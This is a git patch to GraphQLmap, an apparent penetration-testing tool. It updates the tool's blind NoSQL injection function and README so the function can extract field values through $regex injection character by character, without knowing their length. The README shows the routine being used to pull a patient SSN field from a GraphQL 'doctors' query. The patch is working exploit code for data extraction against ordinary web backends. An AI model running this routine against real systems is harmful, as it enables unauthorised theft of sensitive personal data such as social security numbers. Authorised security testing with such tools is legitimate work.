From 6176bd3afc5cca548a9d0dce55a57d04b00be1e5 Mon Sep 17 00:00:00 2001 From: onSec-fr Date: Wed, 22 Apr 2020 11:32:48 +0200 Subject: [PATCH] Update attacks.py #Change : blind_nosql #Benefits : It can find the full value without knowing its length + Avoid infinite loops. -Removed the "data_size" parameter. Now it stops searching as soon as it no longer finds valid characters. -Add : Ability to set a custom charset. --- README.md | 2 ++ attacks.py | 22 +++++++++++++--------- 2 files changed, 15 insertions(+), 9 deletions(-) diff --git a/README.md b/README.md index 2942070..015e04d 100644 --- a/README.md +++ b/README.md @@ -134,7 +134,9 @@ Use `BLIND_PLACEHOLDER` inside the query for the `nosqli` function. GraphQLmap > nosqli Query > {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}} Check > 5d089c51dcab2d0032fdd08d +Charset > 0123456789abcdef- [+] Data found: 4f537c0a-7da6-4acc-81e1-8c33c02ef3b +GraphQLmap > ``` ### SQL injection diff --git a/attacks.py b/attacks.py index d88a370..b3d80e2 100644 --- a/attacks.py +++ b/attacks.py @@ -159,24 +159,28 @@ def blind_mssql(url, method, headers): def blind_nosql(url, method, headers): - # Query : {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}} - # Check : "5d089c51dcab2d0032fdd08d" - + # Query - include BLIND_PLACEHOLDER. e.g. {doctors(options: "{\"\"patients.ssn\":1}", search: "{ \"patients.ssn\": { \"$regex\": \"^BLIND_PLACEHOLDER\"}, \"lastName\":\"Admin\" , \"firstName\":\"Admin\" }"){id, firstName}} query = input("Query > ") + # Check the input (known value) against the data found - e.g. 5d089c51dcab2d0032fdd08d check = input("Check > ") + # Charset to use - Default abcdefghijklmnopqrstuvwxyz1234567890 + charset = input("Charset > ") + if(not charset): + charset = "abcdefghijklmnopqrstuvwxyz1234567890" data = "" - data_size = 35 - charset = "0123456789abcdef-" - - while len(data) != data_size: + _break = False + + while (_break == False): + old_data = data for c in charset: injected = query.replace("BLIND_PLACEHOLDER", data + c) r = requester(url, method, injected, headers) if check in r.text: data += c - # display data and update the current line print("\r\033[92m[+] Data found:\033[0m {}".format(data), end='', flush=False) - + # Stop if no character is found + if(old_data == data): + _break = True # force a line return to clear the screen after the data trick print("")